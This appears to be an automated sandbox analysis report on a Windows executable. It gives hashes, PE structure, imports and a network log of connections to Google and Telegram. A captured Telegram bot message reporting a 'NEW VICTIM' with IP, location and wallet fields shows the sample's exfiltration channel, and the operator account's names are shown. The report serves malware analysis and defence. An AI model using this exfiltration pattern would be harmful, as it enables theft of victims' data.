                                                                                                                                                                SSDEEP:24:YKOHM0y1JVBa4YGQVPe071kWoPyoZEB6BasJENBm9c:YVHM0QTBj/Q51UPtZ7ujMc
                                                                                                                                                                MD5:68B7EC7CFC89E2C83C1E17DE9E26E46A
                                                                                                                                                                SHA1:E4787AD96FAE497E95D30548D86814C6718F028A
                                                                                                                                                                SHA-256:EF1516C166403695538099706F2F9FC25F8DECB50EE148099234BF12316C84D6
                                                                                                                                                                SHA-512:6E52976B909F0E690A9C98A3B7D91C6193B9891C0F20200401BE54FCCE9D57B1535F2D7342575735795775F929E40CE862BCAE6F32EB9F18856E134B0B9C58E1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"ok":true,"result":{"message_id":3332,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734019285,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 648351\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Entropy (8bit):6.377818589865092
                                                                                                                                                                TrID:
                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:file.exe
                                                                                                                                                                File size:605'696 bytes
                                                                                                                                                                MD5:3567cb15156760b2f111512ffdbc1451
                                                                                                                                                                SHA1:2fdb1f235fc5a9a32477dab4220ece5fda1539d4
                                                                                                                                                                SHA256:0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
                                                                                                                                                                SHA512:e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba
                                                                                                                                                                SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                TLSH:E5D45C1666A800FCE1EBD238CA574513FA76B84603A19ADF13D097672F176E09F3E721
                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B........v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw.....
                                                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                                                Entrypoint:0x14004320c
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x6731B531 [Mon Nov 11 07:41:37 2024 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:6
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:6
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:b1d65f7e4aa92d9c11708d0d9ee127a1
                                                                                                                                                                Instruction
                                                                                                                                                                lea eax, dword ptr [ebx+04h]
                                                                                                                                                                call 00007F02D51BCA21h

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8be98 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x96000 | 0x448 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x91000 | 0x4c74 | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x97000 | 0xb90 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x80480 | 0x70 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x80680 | 0x28 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x80340 | 0x140 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x70000 | 0x4a8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x6ec3e | 0x6ee00 | e5d9e86ceef61c40af75d00b1338553d | False | 0.4871956912344983 | data | 6.39857414841088 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x70000 | 0x1ce64 | 0x1d000 | cc5419dfe862265139bacec5ab07010e | False | 0.44227337015086204 | data | 5.432264074009666 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x8d000 | 0x3bec | 0x1c00 | cd69d42d368ffc43ed3d9449389d5e0d | False | 0.16378348214285715 | DOS executable (block device driver) | 3.2710072108015398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .pdata | 0x91000 | 0x4c74 | 0x4e00 | eb4cdabd0756133d95aec7355655271a | False | 0.4788661858974359 | data | 5.735627608296407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x96000 | 0x448 | 0x600 | 1e9590800244ea67bbd5f82b3a6f4221 | False | 0.3580729166666667 | data | 3.380125227099815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x97000 | 0xb90 | 0xc00 | 5ce72d9d30afddbdf14b43241fe9c99b | False | 0.4889322916666667 | data | 5.370062744008093 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x960a0 | 0x220 | data | English | United States | 0.5036764705882353 |
| RT_MANIFEST | 0x962c0 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143 |

| DLL | Import |
|---|---|
| KERNEL32.dll | GetEnvironmentVariableW, InitializeCriticalSectionEx, FindClose, OpenProcess, CreateToolhelp32Snapshot, GetLastError, Process32NextW, K32GetModuleBaseNameW, DeleteFileW, Process32FirstW, CloseHandle, TerminateProcess, DecodePointer, DeleteCriticalSection, ExitProcess, CreateProcessW, WideCharToMultiByte, GetConsoleWindow, K32EnumProcessModules, MultiByteToWideChar, WriteConsoleW, SetEndOfFile, GetProcessHeap, SetEnvironmentVariableW, FindNextFileW, FindFirstFileW, K32EnumProcesses, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, HeapSize, HeapReAlloc, GetTimeZoneInformation, SetStdHandle, ReadConsoleW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateDirectoryW, CreateFileW, FindFirstFileExW, GetFileAttributesExW, SetFileInformationByHandle, AreFileApisANSI, GetModuleHandleW, GetProcAddress, GetFileInformationByHandleEx, QueryPerformanceCounter, QueryPerformanceFrequency, GetStringTypeW, GetCurrentThreadId, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, SleepConditionVariableSRW, Sleep, WaitForSingleObjectEx, GetExitCodeThread, GetSystemTimeAsFileTime, EnterCriticalSection, LeaveCriticalSection, EncodePointer, LCMapStringEx, WakeAllConditionVariable, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, RaiseException, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetFileType, ReadFile, GetModuleFileNameW, GetStdHandle, WriteFile, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapAlloc, RtlUnwind |
| USER32.dll | ShowWindow |
| ADVAPI32.dll | RegSetValueExA, RegOpenKeyExA, RegCloseKey |
| ole32.dll | CoInitialize, CoInitializeEx, CoCreateInstance, CoUninitialize |
| OLEAUT32.dll | SysFreeString, SysAllocString, VariantClear, VariantInit |
| WS2_32.dll | WSAStartup, WSACleanup, gethostname |
| NETAPI32.dll | NetUserEnum, NetApiBufferFree |
| WININET.dll | InternetOpenUrlA, InternetCloseHandle, InternetOpenA, InternetReadFile |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
                                                                                                                                                                Dec 12, 2024 17:01:18.804004908 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.811563015 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.811624050 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.814147949 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.814202070 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.820739031 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.820854902 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.827891111 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.827944994 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.830585957 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.830635071 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.841392994 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.841451883 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.844419003 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.844475031 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.855066061 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.855129004 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.858093023 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.858247995 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.869076014 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.869136095 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.872185946 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.872242928 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.882864952 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.882941008 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.885885000 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.886028051 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.895972967 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.896032095 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.899128914 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.899188042 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.909919024 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.909971952 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.909979105 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.910022020 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.924923897 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.924978018 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.948792934 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.948884964 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.948925018 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.948973894 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.976751089 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.976880074 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.976891041 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.976938009 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.978851080 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.978903055 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.983211994 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.983261108 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.983428001 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.983477116 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.986824036 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.986876011 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.986965895 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.987006903 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.997437954 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.997487068 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.997576952 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.997617960 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.997623920 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.997673035 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.008430004 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.008492947 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.008555889 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.008598089 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.018973112 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.019026041 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.019088984 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.019129992 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.029249907 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.029297113 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.029402971 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.029447079 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.040235996 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.040288925 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.040328979 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.040371895 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.050273895 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.050344944 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.051078081 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.051126957 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.061587095 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.061692953 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.061705112 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.061750889 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.070115089 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.070200920 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.070213079 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.070259094 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.079633951 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.079711914 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.079749107 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.079813957 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.088890076 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.088951111 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.089030027 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.089073896 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.099412918 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.100003958 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.100008011 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.100049019 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.107542038 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.108562946 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.108567953 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.108608007 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.115962029 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.116028070 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.116070032 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.116115093 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.116118908 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.116161108 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.117319107 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.117368937 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.124502897 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.124581099 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.125271082 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.125330925 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.133018017 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.136332035 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.136358976 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.136404991 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.139724016 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.139789104 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.282670021 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.293993950 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.294064999 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.294291973 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.294348955 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.307074070 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.307153940 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.307176113 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.307229996 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.320514917 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.320575953 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.362478018 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.362555981 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.363924026 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.363991022 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.364008904 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.364067078 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.368753910 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.368815899 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.373281002 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.373342991 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.374598980 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.374663115 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.374707937 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.374767065 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.380759001 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.380815983 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.380851984 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.380903959 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.380933046 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.380990028 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.391843081 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.391916037 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.392118931 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.392195940 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.404759884 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.404824972 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.405997038 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.406059027 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.415700912 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.415767908 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.415803909 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.415864944 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.422501087 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.422564030 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.422590017 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.422641993 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.432925940 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.432984114 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.433017015 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.433070898 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.440099955 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:21.440139055 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.440198898 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:21.440458059 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:21.440469027 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.442694902 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.442754030 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.442797899 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.442845106 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.469253063 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.469321012 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.469341040 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.469397068 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.470343113 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.470400095 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.470421076 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.470488071 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.474355936 CET44349707172.217.17.65192.168.2.5
